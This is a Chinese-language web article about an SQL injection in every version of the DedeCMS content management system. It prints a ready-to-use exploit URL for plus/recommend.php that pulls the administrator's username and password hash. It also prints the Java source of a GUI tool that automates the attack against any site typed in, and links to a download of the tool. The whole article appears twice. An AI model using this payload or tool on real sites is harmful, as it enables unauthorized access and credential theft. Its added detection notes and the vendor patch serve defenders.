DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日
近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,大家早点去官方下载补丁2014年2月28日... 14-02-28...
dedecms即织梦(php开源网站内容管理系统)。织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的php开源网站管理系统,也是使用用户最多的php类cms系统。
近日,网友在dedecms中发现了全版本通杀的sql注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:
exp:
http://*.*.com/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=111
直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示
利用工具源码(by 园长):
package org.javaweb.dede.ui;
import java.awt.toolkit;
import java.io.bufferedreader;
import java.io.inputstreamreader;
import java.net.url;
import java.util.regex.matcher;
import java.util.regex.pattern;
/**
*
* @author yz
*/
public class mainframe extends javax.swing.jframe {
// Swing front end for the recommend.php SQL-injection issue described in the article above:
// one URL field, one button and one text area for the result.
// As pasted, the listing is lower-cased throughout (`string`, `jframe`, `exception`, ...), so it
// does not compile unmodified; it is kept verbatim here as documentation of the technique.
// Defender's note: the request assembled in jbutton1actionperformed is very distinctive, which
// makes it easy to alert on in web-server or WAF logs; remediation is the vendor patch the
// article refers to.
private static final long serialversionuid = 1l;
/**
* Creates the frame and builds its components (see initcomponents).
*/
public mainframe() {
initcomponents();
}
/**
* Fetches {@code url} and returns the whole response body, one line per CR LF.
* <p>
* On any exception the exception text is written to the result text area and whatever was read
* so far (possibly the empty string) is returned, so a caller cannot tell a failed request from
* an empty page. The reader is never closed and no connect/read timeout is configured, so an
* unresponsive host blocks the caller (here the Swing event thread) until the connection gives up.
* No charset is passed to the reader, so the platform default is used to decode the body.
*
* @param url absolute URL to fetch
* @return the body read so far, with CR LF line endings
*/
public string request(string url){
string str = "",tmp;
try {
bufferedreader br = new bufferedreader(new inputstreamreader(new url(url).openstream()));
while((tmp=br.readline())!=null){
str+=tmp+"\r\n"; // body built by repeated concatenation
}
} catch (exception e) {
jtextarea1.settext(e.tostring());
}
return str;
}
/**
* Builds the single-panel UI and centres the window on screen. The layout code has the shape
* of GUI-builder output (the trailing editor-fold marker suggests NetBeans); the only
* hand-written behaviour is wiring the button to jbutton1actionperformed.
*/
private void initcomponents() {
jpanel1 = new javax.swing.jpanel();
jlabel1 = new javax.swing.jlabel();
jtextfield1 = new javax.swing.jtextfield();
jbutton1 = new javax.swing.jbutton();
jscrollpane1 = new javax.swing.jscrollpane();
jtextarea1 = new javax.swing.jtextarea();
setdefaultcloseoperation(javax.swing.windowconstants.exit_on_close);
jlabel1.settext("url:");
// The HTML anchor inside the literal is an artefact of the article site's auto-linking;
// presumably the original source held just the URL string.
jtextfield1.settext("<a href="http://localhost">http://localhost</a>");
this.settitle("dedecms recommend.php注入利用工具-p2j.cn");
// 458x316 window placed at the centre of the primary screen.
int screenwidth = toolkit.getdefaulttoolkit().getscreensize().width;
int screenheight = toolkit.getdefaulttoolkit().getscreensize().height;
this.setbounds(screenwidth / 2 - 229, screenheight / 2 - 158, 458, 316);
jbutton1.settext("获取");
jbutton1.addactionlistener(new java.awt.event.actionlistener() {
public void actionperformed(java.awt.event.actionevent evt) {
jbutton1actionperformed(evt);
}
});
jtextarea1.setcolumns(20);
jtextarea1.setrows(5);
jscrollpane1.setviewportview(jtextarea1);
javax.swing.grouplayout jpanel1layout = new javax.swing.grouplayout(jpanel1);
jpanel1.setlayout(jpanel1layout);
jpanel1layout.sethorizontalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.trailing, false)
.addcomponent(jscrollpane1, javax.swing.grouplayout.alignment.leading)
.addgroup(javax.swing.grouplayout.alignment.leading, jpanel1layout.createsequentialgroup()
.addcontainergap()
.addcomponent(jlabel1)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jtextfield1, javax.swing.grouplayout.preferred_size, 331, javax.swing.grouplayout.preferred_size)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jbutton1, javax.swing.grouplayout.preferred_size, 83, javax.swing.grouplayout.preferred_size)))
.addgap(0, 0, short.max_value))
);
jpanel1layout.setverticalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addcontainergap()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.baseline)
.addcomponent(jlabel1)
.addcomponent(jtextfield1,
javax.swing.grouplayout.preferred_size,
javax.swing.grouplayout.default_size,
javax.swing.grouplayout.preferred_size)
.addcomponent(jbutton1))
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jscrollpane1, javax.swing.grouplayout.default_size, 254, short.max_value))
);
javax.swing.grouplayout layout = new javax.swing.grouplayout(getcontentpane());
getcontentpane().setlayout(layout);
layout.sethorizontalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
layout.setverticalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
pack();
}// </editor-fold>
/**
* Button handler. Takes the site base URL from the text field, appends the fixed recommend.php
* query string (the article's payload, URL-encoded) and scrapes the response: the vulnerable page
* presumably echoes the injected {@code userid|pwd} pair inside its first {@code <h2>} element,
* which is split on {@code |} and displayed as username and md5.
* <p>
* A null or empty URL does nothing. No trailing-slash normalisation is done on the base URL, and
* only the first {@code <h2>} match is considered. {@code substring(3, length-1)} trims the hash
* field; why those exact offsets is not visible here. Any failure inside request() leaves the
* exception text in the text area instead of a result.
* <p>
* Detection: a request for {@code /plus/recommend.php} whose {@code _files[type][tmp_name]}
* parameter carries a union/select payload is the access-log signature to look for.
*/
private void jbutton1actionperformed(java.awt.event.actionevent evt) {
string url = jtextfield1.gettext();
if(null==url||"".equals(url)){
return ;
}
string result = request(url+"/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=4294");
matcher m = pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
string[] s = m.group(1).split("\\|"); // expected layout: "", userid, pwd
if(s.length>2){
jtextarea1.settext("username:"+s[1]+"\r\nmd5:"+s[2].substring(3,s[2].length()-1));
}
}
}
/**
* Entry point: creates and shows the frame on the AWT event-dispatch thread.
*
* @param args ignored
*/
public static void main(string args[]) {
java.awt.eventqueue.invokelater(new runnable() {
public void run() {
new mainframe().setvisible(true);
}
});
}
// variables declaration - do not modify
private javax.swing.jbutton jbutton1;
private javax.swing.jlabel jlabel1;
private javax.swing.jpanel jpanel1;
private javax.swing.jscrollpane jscrollpane1;
private javax.swing.jtextarea jtextarea1; // result / error output
private javax.swing.jtextfield jtextfield1; // site base URL entered by the user
// end of variables declaration
}
利用工具下载地址 http://pan.baidu.com/s/1i37lunf (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)
dedecms官方补丁地址:
近日,网友在dedecms中发现了全版本通杀的sql注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:
exp:
代码如下:http://*.*.com/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=111
直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示
利用工具源码(by 园长):
代码如下:
package org.javaweb.dede.ui;
import java.awt.toolkit;
import java.io.bufferedreader;
import java.io.inputstreamreader;
import java.net.url;
import java.util.regex.matcher;
import java.util.regex.pattern;
/**
*
* @author yz
*/
public class mainframe extends javax.swing.jframe {
// Swing front end for the recommend.php SQL-injection issue described in the article above:
// one URL field, one button and one text area for the result.
// As pasted, the listing is lower-cased throughout (`string`, `jframe`, `exception`, ...), so it
// does not compile unmodified; it is kept verbatim here as documentation of the technique.
// Defender's note: the request assembled in jbutton1actionperformed is very distinctive, which
// makes it easy to alert on in web-server or WAF logs; remediation is the vendor patch the
// article refers to.
private static final long serialversionuid = 1l;
/**
* Creates the frame and builds its components (see initcomponents).
*/
public mainframe() {
initcomponents();
}
/**
* Fetches {@code url} and returns the whole response body, one line per CR LF.
* <p>
* On any exception the exception text is written to the result text area and whatever was read
* so far (possibly the empty string) is returned, so a caller cannot tell a failed request from
* an empty page. The reader is never closed and no connect/read timeout is configured, so an
* unresponsive host blocks the caller (here the Swing event thread) until the connection gives up.
* No charset is passed to the reader, so the platform default is used to decode the body.
*
* @param url absolute URL to fetch
* @return the body read so far, with CR LF line endings
*/
public string request(string url){
string str = "",tmp;
try {
bufferedreader br = new bufferedreader(new inputstreamreader(new url(url).openstream()));
while((tmp=br.readline())!=null){
str+=tmp+"\r\n"; // body built by repeated concatenation
}
} catch (exception e) {
jtextarea1.settext(e.tostring());
}
return str;
}
/**
* Builds the single-panel UI and centres the window on screen. The layout code has the shape
* of GUI-builder output (the trailing editor-fold marker suggests NetBeans); the only
* hand-written behaviour is wiring the button to jbutton1actionperformed.
*/
private void initcomponents() {
jpanel1 = new javax.swing.jpanel();
jlabel1 = new javax.swing.jlabel();
jtextfield1 = new javax.swing.jtextfield();
jbutton1 = new javax.swing.jbutton();
jscrollpane1 = new javax.swing.jscrollpane();
jtextarea1 = new javax.swing.jtextarea();
setdefaultcloseoperation(javax.swing.windowconstants.exit_on_close);
jlabel1.settext("url:");
// The HTML anchor inside the literal is an artefact of the article site's auto-linking;
// presumably the original source held just the URL string.
jtextfield1.settext("<a href="http://localhost">http://localhost</a>");
this.settitle("dedecms recommend.php注入利用工具-p2j.cn");
// 458x316 window placed at the centre of the primary screen.
int screenwidth = toolkit.getdefaulttoolkit().getscreensize().width;
int screenheight = toolkit.getdefaulttoolkit().getscreensize().height;
this.setbounds(screenwidth / 2 - 229, screenheight / 2 - 158, 458, 316);
jbutton1.settext("获取");
jbutton1.addactionlistener(new java.awt.event.actionlistener() {
public void actionperformed(java.awt.event.actionevent evt) {
jbutton1actionperformed(evt);
}
});
jtextarea1.setcolumns(20);
jtextarea1.setrows(5);
jscrollpane1.setviewportview(jtextarea1);
javax.swing.grouplayout jpanel1layout = new javax.swing.grouplayout(jpanel1);
jpanel1.setlayout(jpanel1layout);
jpanel1layout.sethorizontalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.trailing, false)
.addcomponent(jscrollpane1, javax.swing.grouplayout.alignment.leading)
.addgroup(javax.swing.grouplayout.alignment.leading, jpanel1layout.createsequentialgroup()
.addcontainergap()
.addcomponent(jlabel1)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jtextfield1, javax.swing.grouplayout.preferred_size, 331, javax.swing.grouplayout.preferred_size)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jbutton1, javax.swing.grouplayout.preferred_size, 83, javax.swing.grouplayout.preferred_size)))
.addgap(0, 0, short.max_value))
);
jpanel1layout.setverticalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addcontainergap()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.baseline)
.addcomponent(jlabel1)
.addcomponent(jtextfield1,
javax.swing.grouplayout.preferred_size,
javax.swing.grouplayout.default_size,
javax.swing.grouplayout.preferred_size)
.addcomponent(jbutton1))
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jscrollpane1, javax.swing.grouplayout.default_size, 254, short.max_value))
);
javax.swing.grouplayout layout = new javax.swing.grouplayout(getcontentpane());
getcontentpane().setlayout(layout);
layout.sethorizontalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
layout.setverticalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
pack();
}// </editor-fold>
/**
* Button handler. Takes the site base URL from the text field, appends the fixed recommend.php
* query string (the article's payload, URL-encoded) and scrapes the response: the vulnerable page
* presumably echoes the injected {@code userid|pwd} pair inside its first {@code <h2>} element,
* which is split on {@code |} and displayed as username and md5.
* <p>
* A null or empty URL does nothing. No trailing-slash normalisation is done on the base URL, and
* only the first {@code <h2>} match is considered. {@code substring(3, length-1)} trims the hash
* field; why those exact offsets is not visible here. Any failure inside request() leaves the
* exception text in the text area instead of a result.
* <p>
* Detection: a request for {@code /plus/recommend.php} whose {@code _files[type][tmp_name]}
* parameter carries a union/select payload is the access-log signature to look for.
*/
private void jbutton1actionperformed(java.awt.event.actionevent evt) {
string url = jtextfield1.gettext();
if(null==url||"".equals(url)){
return ;
}
string result = request(url+"/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=4294");
matcher m = pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
string[] s = m.group(1).split("\\|"); // expected layout: "", userid, pwd
if(s.length>2){
jtextarea1.settext("username:"+s[1]+"\r\nmd5:"+s[2].substring(3,s[2].length()-1));
}
}
}
/**
* Entry point: creates and shows the frame on the AWT event-dispatch thread.
*
* @param args ignored
*/
public static void main(string args[]) {
java.awt.eventqueue.invokelater(new runnable() {
public void run() {
new mainframe().setvisible(true);
}
});
}
// variables declaration - do not modify
private javax.swing.jbutton jbutton1;
private javax.swing.jlabel jlabel1;
private javax.swing.jpanel jpanel1;
private javax.swing.jscrollpane jscrollpane1;
private javax.swing.jtextarea jtextarea1; // result / error output
private javax.swing.jtextfield jtextfield1; // site base URL entered by the user
// end of variables declaration
}
利用工具下载地址 http://pan.baidu.com/s/1i37lunf (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)
dedecms官方补丁地址: